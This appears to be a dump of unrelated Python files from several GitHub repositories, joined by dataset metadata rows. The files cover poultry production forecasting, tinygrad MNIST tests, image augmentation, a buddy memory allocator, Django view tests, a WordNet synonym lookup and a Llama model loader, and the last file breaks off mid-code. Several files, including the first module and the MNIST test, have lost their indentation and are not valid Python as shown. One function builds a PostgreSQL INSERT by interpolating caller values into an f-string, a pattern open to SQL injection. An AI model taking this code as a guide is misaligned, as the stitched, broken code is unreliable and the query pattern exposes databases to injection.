nBirdsType=param_init['nBirdsType'],
Remark=param_init['Remark']
)
def get_xuanyongrate(bird_type,nGen):
result = 0
try:
result = WholeParameter.objects.all().values('XuanYongRate').filter(nBirdsType=bird_type,nGeneration=nGen)[0]['XuanYongRate']
except Exception as e:
        print('The error reason is:', str(e))
return result
# def calc_baiyu_weekly_median_core(bird_type,nGen,CompanyId,SpeciesId,feedWayId,chandan_interval=3):
#
# print("%"*20)
# param_all = get_weekly_param_standard_all(bird_type,nGen,SpeciesId,feedWayId)
# taotaiji_param_all = get_taotaiji_param_all(bird_type,nGen)
# xuanyongrate = get_xuanyongrate(bird_type,nGen)
# date_list = get_date_standard_list()
# print("%" * 20)
# rushe_DateList = get_Rushe_timeList(nGen,bird_type,2006)
#
#     ## clear the existing rows in the baiyu_weeklyintroducedmedian table
# cleanup_weeklyintroducedmedian(bird_type,nGen)
#
# med_core_data_list = []
#
# for index in rushe_DateList:
#         # using the year, week number and live period, compute the data for every week within the live period
# start_year = index['Year'] #2006
# start_week = index['WeekNum'] #2
# rushe_num = index['RuSheNum'] #15000
# dan_tmp_list = []
# for iWeek in range(index['LivePeriod']+chandan_interval):
# cur_year,cur_week,start_date,end_date = get_year_week_by_offset_function(date_list, start_year, start_week, iWeek)
# shengchanWeek = iWeek+1
#             ## from the start year/week, derive each following week's year and week within the live period, e.g. three weeks after week 1 of 2006 is week 4 of 2006
# yuchengCunlan = 0
# chandanCunlan = 0
# chandanNum = 0
# chuji_num = 0
# real_sale_chuji_num = 0
# TaoTaiJiNum = 0
# taotai_jirou = 0
#
# if iWeek == index['LivePeriod']:
# TaoTaiJiNum = rushe_num
# else:
# TaoTaiJiNum = 0
#
# if iWeek < index['LivePeriod']:
#             ### production weeks before week 25 are the rearing period; the laying period starts at week 25
#             if shengchanWeek < 25: # the 25 should be fetched dynamically
# yuchengCunlan = rushe_num #15000
# chandanCunlan = 0
# else:
# yuchengCunlan = 0
# chandanCunlan = rushe_num
#
#                 ## compute the number of eggs from the laying-period stock
# chandanNum = round(chandanCunlan*param_all[iWeek]['ChanDanRate']/100*7)
# dan_tmp_list.append(chandanNum)
#
# '''
#                 Get the egg count from three weeks earlier; incubation takes 21 days, counted as 3 weeks.
# '''
# if shengchanWeek < (25+ chandan_interval):
# dan_init = 0
# shoujing_rate = 0
# rufu_zhongdan_rate = 0
# fuhua_rate = 0
#
# else:
# dan_init = dan_tmp_list[iWeek-chandan_interval]
# shoujing_rate = param_all[iWeek-chandan_interval]['ShouJingRate'] / 100
# rufu_zhongdan_rate = param_all[iWeek-chandan_interval]['RuFuZhongDanRate']/100
# fuhua_rate = param_all[iWeek-chandan_interval]['FuHuaRate']/100
# jianchu_rate = param_all[iWeek]['JianChuRate']/100
# chuji_num = round(dan_init*shoujing_rate*rufu_zhongdan_rate*fuhua_rate*jianchu_rate*xuanyongrate/100)
# real_sale_chuji_num = chuji_num
#
#
# taotai_jirou = TaoTaiJiNum * taotaiji_param_all[index['Year']-1990]['StandardTZ'] * taotaiji_param_all[index['Year']-1990]['TuZaiRate']*1.0/100
#
# rushe_num = round(rushe_num*(100-param_all[iWeek]['siTaoRate'])/100)
#
# # print(index['Year'],index['WeekNum'],shengchanWeek,yuchengCunlan, chandanCunlan, chandanNum, chuji_num, real_sale_chuji_num,TaoTaiJiNum,taotai_jirou)
# item = WeeklyIntroducedMedian(
#
# originYear=start_year,
# originWeek=start_week,
# Year=cur_year,
# WeekNum=cur_week,
# startDate=start_date,
# endDate=end_date,
# CompanyId=CompanyId,
# SpeciesId=SpeciesId,
# feedWayId=feedWayId,
# shengchanWeek=shengchanWeek,
# TotalYuChengCunLan=yuchengCunlan,
# TotalChanDanCunLan=chandanCunlan,
# TotalDan=chandanNum,
# TotalChuJi=chuji_num,
# TotalFactSaleChuJi=real_sale_chuji_num,
# TaoTaiJiNum=TaoTaiJiNum,
# dTaoTaiJiRou=taotai_jirou,
# nBirdsType=bird_type,
# nGeneration=nGen,
# Remark=''
# )
# med_core_data_list.append(item)
# WeeklyIntroducedMedian.objects.bulk_create(med_core_data_list)
def get_weekly_param_standard_all(bird_type,nGen):
result = []
try:
res = WeekStandardTable.objects.all().values().filter(nBirdsType=bird_type,nGeneration=nGen)
result = res
    except Exception as e:
        print('get_weekly_param_standard_all:The Error Reason is:', str(e))
return result
def get_date_standard_list():
    res = []
    try:
        res = WeekDateStandard.objects.all().values('id', 'Year', 'WeekNum', 'startDate', 'endDate').filter(Year__gt=2000)
except Exception as e:
print(e)
return res
# def get_year_week_by_offset_function(list_res,year,week_num,offset):
#
# cur_year = '0000-00-00'
# cur_week = 0
# tmp = 0
# for index,elem in enumerate(list_res):
# if elem['Year'] == year and elem['WeekNum'] == week_num:
# tmp = index
# break
# cur_year = list_res[tmp + offset]['Year']
# cur_week = list_res[tmp + offset]['WeekNum']
# start_date = list_res[tmp + offset]['startDate']
# end_date = list_res[tmp + offset]['endDate']
# return cur_year,cur_week,start_date,end_date
# def gen_fumudai_introdeced_data(
# CompanyId = 1,
# SpeciesId = 1,
# feedWayId = 1,
# nGen=2,
# nDraftOrOriginal=1,
# nBirdsType=1,
# Remark=''
# ):
#     ## step0: clear all existing parent-generation introduction records from the table
# clean_introducd_detail_info(nBirdsType,nGen)
#     ## step1: fetch the list of parent-generation introduction dates
# time_res = IntroducedInfoDetail.objects.values('Year','WeekNum','LivePeriod').filter(nBirdsType=nBirdsType,nGeneration=nGen-1)
#     ## step2: insert one record per entry in the date list
# for index in time_res:
# startDate,endDate = get_start_end_date_by_week(index['Year'], index['WeekNum'])
# rushe_num = get_fumudai_rushe_num(index['Year'], index['WeekNum'], nBirdsType, nGen-1)
# print(startDate,endDate,rushe_num)
# insertDB_introduced_detail_info(
# Year=index['Year'],
# WeekNum=index['WeekNum'],
# startDate=startDate,
# endDate=endDate,
# CompanyId=CompanyId,
# SpeciesId=SpeciesId,
# feedWayId=feedWayId,
#             RuSheNum=rushe_num, ## derived from the grandparent flock's actual chick sales
#             LivePeriod=index['LivePeriod'], ## taken from the parent-generation weekly standard
# qzhyFlag= 0 ,
# huanyuRate= 0,
# qzhyStartWeek=0,
# HuanyuInterval=0,
# qzhyPeriod=0,
# nGeneration = nGen,
# nDraftOrOriginal = nDraftOrOriginal,
# nBirdsType = nBirdsType,
# Remark=Remark
# )
def clean_introducd_detail_info(nBirdsType,nGen):
try:
IntroducedInfoDetail.objects.filter(nBirdsType=nBirdsType,nGeneration=nGen).delete()
except Exception as e:
print(e)
def get_fumudai_rushe_num(year,week_num,bird_type,nGen):
RuSheNum = 0
try:
res = WeeklyCoreTable.objects.values('TotalFactSaleChuJi').filter(Year = year, WeekNum= week_num,nBirdsType=bird_type,nGeneration=nGen)
RuSheNum = res[0]['TotalFactSaleChuJi']
except Exception as e:
print('get_fumudai_rushe_num:The error reason is :',str(e))
return RuSheNum
def cleanup_weeklyintroducedmedian(bird_type,nGen):
try:
res = WeeklyIntroducedMedian.objects.all().filter(nBirdsType=bird_type,nGeneration=nGen).delete()
except Exception as e:
print('The Error Reason is :',str(e))
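# Hypothetical driver sketch (the function name and argument values are assumptions,
# not part of this module): a typical call order for regenerating parent-generation
# introduction rows from the grandparent flock's actual chick sales.
def _example_rebuild_fumudai(nGen=2, bird_type=1):
    clean_introducd_detail_info(bird_type, nGen)
    for row in get_zudai_chuji_info():
        insertDB_introduced_detail_info(
            Year=row['Year'], WeekNum=row['WeekNum'],
            RuSheNum=row['TotalFactSaleChuJi'],
            nGeneration=nGen, nBirdsType=bird_type)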
|
Suefly/BoyarForecastSystem
|
baiyu/db.py
|
db.py
|
py
| 45,424 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73477696507
|
#!/usr/bin/env python
import os
import unittest
import numpy as np
from tinygrad.tensor import Tensor
import tinygrad.optim as optim
from extra.training import train, evaluate
from extra.utils import fetch, get_parameters
# mnist loader
def fetch_mnist():
import gzip
parse = lambda file: np.frombuffer(gzip.open(file).read(), dtype=np.uint8).copy()
X_train = parse("test/mnist/train-images-idx3-ubyte.gz")[0x10:].reshape((-1, 28*28)).astype(np.float32)
Y_train = parse("test/mnist/train-labels-idx1-ubyte.gz")[8:]
X_test = parse("test/mnist/t10k-images-idx3-ubyte.gz")[0x10:].reshape((-1, 28*28)).astype(np.float32)
Y_test = parse("test/mnist/t10k-labels-idx1-ubyte.gz")[8:]
return X_train, Y_train, X_test, Y_test
# load the mnist dataset
X_train, Y_train, X_test, Y_test = fetch_mnist()
# create a model
class TinyBobNet:
def __init__(self):
self.l1 = Tensor.uniform(784, 128)
self.l2 = Tensor.uniform(128, 10)
def parameters(self):
return get_parameters(self)
def forward(self, x):
return x.dot(self.l1).relu().dot(self.l2).logsoftmax()
# create a model with a conv layer
class TinyConvNet:
def __init__(self):
# https://keras.io/examples/vision/mnist_convnet/
conv = 3
#inter_chan, out_chan = 32, 64
inter_chan, out_chan = 8, 16 # for speed
self.c1 = Tensor.uniform(inter_chan,1,conv,conv)
self.c2 = Tensor.uniform(out_chan,inter_chan,conv,conv)
self.l1 = Tensor.uniform(out_chan*5*5, 10)
def parameters(self):
return get_parameters(self)
def forward(self, x):
x = x.reshape(shape=(-1, 1, 28, 28)) # hacks
x = x.conv2d(self.c1).relu().max_pool2d()
x = x.conv2d(self.c2).relu().max_pool2d()
x = x.reshape(shape=[x.shape[0], -1])
return x.dot(self.l1).logsoftmax()
class TestMNIST(unittest.TestCase):
def test_conv(self):
np.random.seed(1337)
model = TinyConvNet()
optimizer = optim.Adam(model.parameters(), lr=0.001)
train(model, X_train, Y_train, optimizer, steps=200)
assert evaluate(model, X_test, Y_test) > 0.95
def test_sgd(self):
np.random.seed(1337)
model = TinyBobNet()
optimizer = optim.SGD(model.parameters(), lr=0.001)
train(model, X_train, Y_train, optimizer, steps=1000)
assert evaluate(model, X_test, Y_test) > 0.95
def test_rmsprop(self):
np.random.seed(1337)
model = TinyBobNet()
optimizer = optim.RMSprop(model.parameters(), lr=0.0002)
train(model, X_train, Y_train, optimizer, steps=1000)
assert evaluate(model, X_test, Y_test) > 0.95
if __name__ == '__main__':
unittest.main()
|
fpaboim/tinysparse
|
test/test_mnist.py
|
test_mnist.py
|
py
| 2,579 |
python
|
en
|
code
| 9 |
github-code
|
6
|
35051600024
|
class Judy:
    @staticmethod
    def min(list1):
        # a @staticmethod receives no self argument; track the smallest element seen
        smallest = list1[0]
        for a in list1:
            if a < smallest:
                smallest = a
        return smallest
list2 = [9,6,3,4,8,52,11]
minimum = Judy.min(list2)
print(minimum)
|
JackyCafe/basicProject
|
basic_14.py
|
basic_14.py
|
py
| 229 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38759751525
|
import cv2
import imutils
import os
import random
from deletor import delete_randomly
"""
image = cv2.imread("dataedit3/train/iv/edit.png")
rows = image.shape[0]
cols = image.shape[1]
img_center = (cols / 2, rows / 2)
M = cv2.getRotationMatrix2D(img_center, -30, 1)
rotated_image = cv2.warpAffine(image,M, (cols, rows), borderValue=(255,255,255))
cv2.imshow('window1',rotated_image)
cv2.waitKey(0)
"""
def rotation_augment(source, angle, dest, roman_no):
print("rotating images by", angle)
folders = os.listdir(source)
for each_class in folders:
path = os.path.join(source, each_class)
imgfiles = os.listdir(path)
for each_img in imgfiles:
imgpath = os.path.join(path, each_img)
#print("imgoath = ", imgpath)
image = cv2.imread(imgpath)
rows = image.shape[0]
cols = image.shape[1]
img_center = (cols / 2, rows / 2)
M = cv2.getRotationMatrix2D(img_center, angle, 1)
rotated_image = cv2.warpAffine(image,M, (cols, rows), borderValue=(255,255,255))
pathtosave = os.path.join((dest), str(each_class))
if not os.path.exists(pathtosave):
os.makedirs(pathtosave)
final_path = os.path.join(pathtosave, ("augmented-" + str(angle) + each_img))
#print("finall path = ", final_path)
cv2.imwrite(final_path, rotated_image)
def setimages(source_path, label, dest_train_path, dest_val_path):
images = os.listdir(source_path)
print("images list = ", images)
#print("sample image name = ", images[10])
    random.shuffle(images)  # shuffles in place; the return value is always None
size = len(images)
print("size = ", size)
train_limit = int((80/100)*size)
print("split no = ", train_limit)
for i in range(train_limit+1):
# getting path of images from 1 - split_no from data augmented folder
path = os.path.join(source_path, images[i])
#print("source path = ", path)
#reading image from that path
img = cv2.imread(path)
#print("image read")
#creating path of final data where images needs to be copied
temp_path = os.path.join(dest_train_path,label)
final_path = os.path.join(temp_path, images[i])
#print("dest path = ", dest_path)
#print("final path = ", final_path)
cv2.imwrite(final_path, img)
#print("image copied")
for i in range(train_limit+1, size):
path = os.path.join(source_path, images[i])
img = cv2.imread(path)
temp_path = os.path.join(dest_val_path,label)
final_path = os.path.join(temp_path, images[i])
cv2.imwrite(final_path, img)
if __name__ == '__main__':
# creating path for train and val data to pull data for augmentation
root1 = os.path.join("dataedit3", "train")
root2 = os.path.join("dataedit3", "val")
#destination dir where the augmented data will be stored
dest = "data-augmented"
    #augmentation rotation parameters: each image yields 4 rotated copies
    angles = [5,-5, 20,-20]
    # instead of numerical labels, we have roman numerals [i,ii,iii,iv,..]
roman_no = os.listdir('dataedit3/train')
label = ['i','ii','iii','iv', 'v', 'vi', 'vii','viii', 'ix', 'x']
# read images from data --> augment it ---> save to another dir (augmented data)
for angle in angles:
print("angle = ", angle)
rotation_augment(root1, angle, dest, roman_no)
rotation_augment(root2, angle, dest, roman_no)
    # size constraint 10,000 --> read images from the augmented data folder --> delete 500 from each class
for each in label:
dir = os.path.join("data-augmented", each)
number = 500
delete_randomly(dir, number)
    # read from the augmented data folder --> copy it to the original dataset
for each_class in range(1,11):
#for each class index [1= i, 2 = ii ,3 = iii.....]
print(each_class)
#create src path to read augmented image. label[each_class] = label[0], label[1]....
src_path = os.path.join("data-augmented", str(label[each_class-1]))
#create dest path where the augmented image will be copied
dest_train_path = os.path.join("dataedit3", "train")
#create val path where the augmented image will be copied
dest_val_path = os.path.join("dataedit3", "val")
        #call the function to copy the augmented data to the original data dir
setimages(src_path , label[each_class-1], dest_train_path , dest_val_path)
|
HiteshKhandelwal901/Data-Centric-Ai-Competation
|
augmentor.py
|
augmentor.py
|
py
| 4,681 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70824848187
|
from resources.models import datetime
import psycopg as ps
from app.utils.validators import user_check, category_check
from app.resources.exceptions import WrongValue
from settings import settings
def dbconnect(func):
def wrapper(*args):
conn = ps.connect(dbname="data",
user=settings.POSTGRES_LOGIN,
password=settings.POSTGRES_PASSWORD,
host=settings.POSTGRES_PATH,
port="5432")
cur = conn.cursor()
try:
return_value = func(*args, cur)
conn.commit()
conn.close()
except Exception as s:
conn.rollback()
conn.close()
raise s
return return_value
return wrapper
@dbconnect
def insert_event(user_id, event_type, category_id, cash_value, cur):
# check values
user_check(user_id)
category_check(category_id)
if isinstance(cash_value, float) is False:
raise WrongValue
cur.execute(f"INSERT INTO events(user_id, event_type, cash_value, category_id, event_timestamp) "
f"VALUES ('{user_id}','{event_type}', {cash_value}, '{category_id}', '{datetime.now()}')")
|
buluvva/moneyflow
|
app/process.py
|
process.py
|
py
| 1,225 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10812141792
|
import random
import time
gests = ('rock', 'scissor', 'paper')
def computer_random():
rad = random.randrange(3)
return rad
def user_win():
print("User win!")
def computer_win():
print("Computer win!")
def draw():
print("Draw!")
def user_gest_number(x):
return gests.index(x)
def who_win(user, comp):
    # paper (index 2) beats rock (index 0): these wrap-around cases invert the
    # general lower-index-wins rule below
    if(user == 0 and comp == 2):
        computer_win()
    elif(user == 2 and comp == 0):
        user_win()
elif(user<comp):
user_win()
elif(comp<user):
computer_win()
else:
draw()
while(True):
    user_gest = input("Type rock, scissor or paper: ")
    if user_gest not in gests:
        print("Unknown gesture, try again!")
        continue
computer_gest = computer_random()
print("Computer choose: ", gests[computer_gest])
print("...")
time.sleep(2)
who_win(gests.index(user_gest), computer_gest)
time.sleep(2)
print("")
print("Let's play again!")
|
trytek235/Python_programs
|
rockScissorsPaper.py
|
rockScissorsPaper.py
|
py
| 860 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3666732447
|
import middle
import env
import os
import time
import json
env.TMP_FOLDER = os.path.join(env.TMP_FOLDER, 'recheck' + time.strftime('%m-%d_%H-%M-%S'))
if not os.path.exists(env.TMP_FOLDER):
os.mkdir(env.TMP_FOLDER)
with open(env.POISONING_DOMAINS_LIST, 'r') as f:
pds = json.load(f)
zdns_domains = os.path.join(env.TMP_FOLDER, 'zdns_domains.txt')
with open(zdns_domains, 'w') as f1:
f1.write('\n'.join(pds))
out1 = os.path.join(env.TMP_FOLDER, 'zdns0.json')
out2 = os.path.join(env.TMP_FOLDER, 'zdns1.json')
out_fnames = [out1, out2]
middle.zdns_scan(zdns_domains, out_fnames)
lines = middle.merge_lines(out1, out2)
result_fname = os.path.join(env.TMP_FOLDER, 'recheck_domain_list_poisoning.json')
middle.clean_zdns_output(lines, result_fname)
|
yingziwu/neatdns
|
recheck.py
|
recheck.py
|
py
| 772 |
python
|
en
|
code
| 14 |
github-code
|
6
|
43282712189
|
from .base import BaseContract
class BuyContract(BaseContract):
"""
Seller sets a specific price, and buyer pays for that price
"""
ENTITY_BUYER = "buyer"
ENTITY_CONTENT_OWNER = "content_owner"
TX_TYPE_CONTENT_TRANSFER = "user-content"
ACTION = "buy"
@property
def req_entities(self):
return super().req_entities() | {self.ENTITY_BUYER, self.ENTITY_CONTENT_OWNER}
def run(self, entities, *args, **kwargs):
# self.validate_entities_structure(entities)
value = kwargs.get("params").get("price", 0)
buyer_addr = self.get_addr(entities, self.ENTITY_BUYER)
# Get the Money from Buyer
self.get_money(buyer_addr, value)
# First payment is to Verifier
value = self.pay_verifier(self.get_addr(entities, self.ENTITY_VERIFIER), value)
if value is None:
return self.FAILURE_STATUS, "Value is set lower than verifier cut"
# Pay content owner
self.pay_content_owner(self.get_addr(entities, self.ENTITY_CONTENT_OWNER), value)
# Transfer content to buyer
self.transfer_content_to_buyer(self.get_addr(entities, self.ENTITY_CONTENT), buyer_addr)
return self.success_return
def get_money(self, buyer, value):
self.transfer_money(buyer, self.address, value)
def pay_content_owner(self, content_owner, value):
self.transfer_money(self.address, content_owner, value)
return value
def transfer_content_to_buyer(self, content, buyer):
self.transactions.append(
{
"to": buyer,
"from": self.address,
"value": content,
"tx_type": self.TX_TYPE_CONTENT_TRANSFER,
"action": self.ACTION
}
)
|
joshtechnologygroup/smart-contract
|
apps/contract/direct_contracts.py
|
direct_contracts.py
|
py
| 1,800 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70321062267
|
class NodoArbol:
def __init__(self,capacidad , ocupado = None, etiqueta = None,izquierdo=None,derecho=None,padre=None):
self.capacidad = capacidad
self.ocupado = ocupado
self.etiqueta = etiqueta
self.hijoIzquierdo = izquierdo
self.hijoDerecho = derecho
self.padre = padre
class ArbolBinario:
def __init__(self, capacidad, etiqueta = None):
self.raiz = NodoArbol(capacidad = capacidad, etiqueta= etiqueta )
self.tamano = 0
self.names = []
self.crearArbol(self.raiz)
def crearArbol(self, nodoActual):
if(nodoActual.capacidad != 2):
nodoActual.hijoIzquierdo = NodoArbol(capacidad= nodoActual.capacidad //2, padre = nodoActual)
nodoActual.hijoDerecho = NodoArbol(capacidad= nodoActual.capacidad //2, padre = nodoActual)
self.crearArbol( nodoActual.hijoIzquierdo)
self.crearArbol( nodoActual.hijoDerecho)
def printArbol(self, nodoActual, nivel = 0, direccion = None):
if nodoActual == self.raiz:
if(nodoActual.ocupado is not None):
print(f"Soy el nodo padre. Mi capacidad es de {nodoActual.capacidad}, tengo ocupados {nodoActual.ocupado} bloques ")
elif(self.revisarHijosPrint(nodoActual)):
print(f"Soy el nodo padre. Ambos de mis hijos se encuentran ocupados ")
else:
print(f"Soy el nodo padre. Mi capacidad es de {nodoActual.capacidad}, aun hay bloques libres ")
self.raiz.padre = nodoActual
else:
for i in range(nivel):
print("\t",end="")
if(nodoActual.ocupado == -1):
print(f"Nodo de capacidad {nodoActual.capacidad}, mi padre se encuentra ocupado por bloques de datos de etiqueta: {nodoActual.etiqueta}, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
elif(self.revisarHijosPrint(nodoActual) and nodoActual.capacidad != 2 and not(nodoActual.etiqueta in self.names)):
print(f"Nodo de capacidad {nodoActual.capacidad}, ambos de mis hijos se encuentran ocupados, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
elif(nodoActual.ocupado is None):
if(nodoActual.capacidad == 2):
print(f"Nodo de capacidad {nodoActual.capacidad}, me encuentro libre, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
else:
print(f"Nodo de capacidad {nodoActual.capacidad}, aun tengo bloques libres, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
else:
print(f"Nodo de capacidad {nodoActual.capacidad}, ocupados {nodoActual.ocupado} bloques de datos de etiqueta: {nodoActual.etiqueta}, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
print("\n")
if (nodoActual.capacidad != 2):
            self.printArbol(nodoActual.hijoIzquierdo, nivel + 1, 'left')
            self.printArbol(nodoActual.hijoDerecho, nivel + 1, 'right')
def revisarHijos(self, nodoActual):
if(nodoActual.capacidad != 2):
if(nodoActual.hijoIzquierdo.ocupado or nodoActual.hijoDerecho.ocupado):
return True
else:
return self.revisarHijos(nodoActual.hijoIzquierdo) or self.revisarHijos(nodoActual.hijoDerecho)
else:
if(nodoActual.ocupado):
return True
def revisarHijosPrint(self, nodoActual):
if(nodoActual.capacidad != 2):
if(nodoActual.hijoIzquierdo.ocupado and nodoActual.hijoDerecho.ocupado):
return True
else:
return self.revisarHijos(nodoActual.hijoIzquierdo) and self.revisarHijos(nodoActual.hijoDerecho)
else:
if(nodoActual.ocupado):
return True
def buscarInsertarArbol(self, capacidad, aOcupar, etiqueta, nodoActual, array):
if (nodoActual.capacidad == capacidad and not(nodoActual.ocupado)):
if(nodoActual.capacidad != 2 ):
if not(self.revisarHijos(nodoActual)):
array.append(nodoActual)
else:
array.append(nodoActual)
else:
if(nodoActual.capacidad!= 2):
self.buscarInsertarArbol(capacidad, aOcupar, etiqueta, nodoActual.hijoIzquierdo, array)
self.buscarInsertarArbol(capacidad, aOcupar, etiqueta, nodoActual.hijoDerecho, array)
return array
def buscarLiberarArbol(self, etiqueta, nodoActual):
if(nodoActual.capacidad != 2):
if( nodoActual.etiqueta == etiqueta):
nodoActual.etiqueta = None
nodoActual.ocupado = None
self.names.remove(etiqueta)
if(nodoActual != self.raiz and not(nodoActual.padre.hijoDerecho.ocupado or nodoActual.padre.hijoIzquierdo.ocupado)):
nodoActual.padre.etiqueta = None
nodoActual.padre.ocupado = None
self.liberarHijos(nodoActual.hijoIzquierdo)
self.liberarHijos(nodoActual.hijoDerecho)
return True
else:
return self.buscarLiberarArbol(etiqueta, nodoActual.hijoIzquierdo) or self.buscarLiberarArbol(etiqueta, nodoActual.hijoDerecho)
else:
if(nodoActual.etiqueta == etiqueta):
self.names.remove(etiqueta)
nodoActual.etiqueta = None
nodoActual.ocupado = None
if(not(nodoActual.padre.hijoDerecho.ocupado or nodoActual.padre.hijoIzquierdo.ocupado)):
nodoActual.padre.etiqueta = None
nodoActual.padre.ocupado = None
return True
def agregar(self, aOcupar, etiqueta):
return self._agregar(aOcupar, etiqueta)
def ocuparHijos(self, nodoActual, etiqueta):
nodoActual.ocupado = -1
nodoActual.etiqueta = etiqueta
if nodoActual.capacidad == 2:
return
self.ocuparHijos(nodoActual.hijoIzquierdo, etiqueta)
self.ocuparHijos(nodoActual.hijoDerecho, etiqueta)
def liberarHijos(self, nodoActual):
nodoActual.ocupado = None
nodoActual.etiqueta = None
if nodoActual.capacidad == 2:
return
self.liberarHijos(nodoActual.hijoIzquierdo)
self.liberarHijos(nodoActual.hijoDerecho)
def _agregar(self, aOcupar, etiqueta):
if(aOcupar > self.raiz.capacidad):
return print("El bloque es mayor al tamaño de memoria maximo")
if(etiqueta in self.names):
return print("Nombre de etiqueta ya existente en memoria")
capacidad = self.raiz.capacidad
while True:
if(aOcupar <= capacidad and aOcupar > capacidad // 2 ):
break
capacidad = capacidad // 2
if capacidad == 1:
capacidad += 1
ingresado = self.buscarInsertarArbol(capacidad = capacidad, aOcupar= aOcupar, etiqueta= etiqueta, nodoActual= self.raiz, array = [])
if(not(ingresado)):
print("Error: no hay suficientes bloques de memoria disponibles, imposible ingresar")
else:
ingresado[0].ocupado = aOcupar
ingresado[0].etiqueta = etiqueta
self.names.append(etiqueta)
print("Bloque ingresado correctamente")
if(ingresado[0].capacidad != 2):
self.ocuparHijos(ingresado[0].hijoIzquierdo, etiqueta)
self.ocuparHijos(ingresado[0].hijoDerecho, etiqueta)
return ingresado[0]
def liberar(self, etiqueta):
if not(etiqueta in self.names):
return print("Imposible liberar memoria de etiqueta no existente")
return self.buscarLiberarArbol(etiqueta, self.raiz)
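# Minimal usage sketch (capacity and labels are made-up values): build a buddy tree
# over 16 blocks, allocate two segments, print the tree, then free one label.
if __name__ == "__main__":
    arbol = ArbolBinario(capacidad=16, etiqueta="root")
    arbol.agregar(3, "A")   # rounded up to a buddy block of size 4
    arbol.agregar(8, "B")
    arbol.printArbol(arbol.raiz)
    arbol.liberar("A")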
|
lombac97/Examen-Lenguajes-1
|
Pregunta 3/buddy.py
|
buddy.py
|
py
| 8,716 |
python
|
es
|
code
| 0 |
github-code
|
6
|
29218727720
|
import pytest
from django.test import Client
from django.urls import reverse
@pytest.fixture
def basic_user_client():
return Client()
@pytest.mark.django_db
class TestWebsiteViews:
def test_index_view_get_response_200(self, basic_user_client):
url = reverse("website:index")
response = basic_user_client.get(url)
assert response.status_code == 200
def test_about_view_get_response_200(self, basic_user_client):
url = reverse("website:about")
response = basic_user_client.get(url)
assert response.status_code == 200
def test_contact_view_get_response_200(self, basic_user_client):
url = reverse("website:contact")
response = basic_user_client.get(url)
assert response.status_code == 200
def test_contact_view_post_response_200(self, basic_user_client):
url = reverse("website:contact")
data = {
"name": "test",
"email": "[email protected]",
"subject": "test subject",
"message": "test message",
"captcha": 1,
}
response = basic_user_client.post(url, data)
assert response.status_code == 200
def test_newsletter_view_post_response_302(self, basic_user_client):
"""after successful post , redirects to the index page"""
url = reverse("website:newsletter")
data = {
"email": "[email protected]",
}
response = basic_user_client.post(url, data)
assert response.status_code == 302
|
smz6990/DRF-Blog
|
core/website/tests/test_views.py
|
test_views.py
|
py
| 1,530 |
python
|
en
|
code
| 2 |
github-code
|
6
|
2734227744
|
# -*- coding: utf-8 -*-
"""
@project ensepro
@since 25/02/2018
@author Alencar Rodrigo Hentges <[email protected]>
"""
from ensepro.constantes import SinonimosConstantes, LoggerConstantes
from nltk.corpus import wordnet as wn
logger = LoggerConstantes.get_logger(LoggerConstantes.MODULO_SINONIMOS)
def get_sinonimos(palavra: str, lang: str) -> list:
"""
Execute a consulta de sinônimos na wordnet.
:param palavra: palavra que se deve bucar os sinônimos
:param lang: linguagem(abreviação) dos quais os sinônimos devem ser tradidos
:return: Lista de string com os sinônimos retornados pela wordnet. A string estará no formato "^.*\.(a|v|n).([0-9][0-9])\..*$"
"""
logger.info("Buscando sinonimos: [palavra=%s, lang=%s]", palavra, lang)
sinonimos = set()
lemmasDaPalavra = wn.lemmas(palavra, lang=SinonimosConstantes.LEMMAS_LANG)
logger.debug("Lemmas da palavra '%s' com lang=%s: %s", palavra, SinonimosConstantes.LEMMAS_LANG, lemmasDaPalavra)
for lemma in lemmasDaPalavra:
synsetNome = lemma.synset().name()
synsetLemmas = wn.synset(synsetNome).lemmas(lang)
for synsetLemma in synsetLemmas:
synsetLammaName = synsetLemma.name()
synsetLemmaSynsetName = synsetLemma.synset().name()
sinonimo = '.'.join([synsetLemmaSynsetName, synsetLammaName])
sinonimos.add(sinonimo)
logger.debug("[lemma=%s] = [synsetNome=%s, synsetLemmas=%s] = [synsetLammaName=%s, synsetLemmaSynsetName=%s] = [sinonimo=%s]",
lemma, synsetNome, synsetLemmas, synsetLammaName, synsetLemmaSynsetName, sinonimo)
logger.info("Sinonimos obtidos: %s", str(sinonimos))
return list(sinonimos)
|
Ensepro/ensepro-core
|
ensepro/sinonimos/sinonimos.py
|
sinonimos.py
|
py
| 1,735 |
python
|
pt
|
code
| 1 |
github-code
|
6
|
36706243233
|
# note: sorted(..., reverse=True) uses a keyword argument, so no extra import is needed
import re
from math import log
def solve(N, budget):
def prepare_hash():
maximum = int('1'*N)
max1 = int(log(maximum)/log(2)) + 1
max2 = int(log(maximum)/log(3)) + 1
_hash = []
for a in range(max1):
for b in range(max2):
v = (2**a)*(3**b)
if v > maximum:
break
_hash.append(v)
return sorted(_hash, reverse=True)
mem = prepare_hash()
L = len(mem)
for i in range(L):
for j in range(i+1, L):
s = mem[i] + mem[j]
m = re.search(r'^(1[01]*)', str(s))
if m:
v = m.span()[1]
print(v, s)
solve(200, 150)
|
franza73/puzzles
|
ibm_feb_2022_2.py
|
ibm_feb_2022_2.py
|
py
| 782 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2373356170
|
import os
from huggingface_hub import login
from transformers import AutoTokenizer, AutoModelForCausalLM
# read the access token from the environment instead of hard-coding a secret
# (the HF_TOKEN variable name is an assumption)
login(token=os.environ["HF_TOKEN"])
tokenizer = AutoTokenizer.from_pretrained("meta-llama/Llama-2-13b-chat-hf")
model = AutoModelForCausalLM.from_pretrained("meta-llama/Llama-2-13b-chat-hf")
input_text = "Hello, how are you?"
inputs = tokenizer.encode(input_text, return_tensors='pt')
# do_sample=True is required for temperature and multiple return sequences to take effect
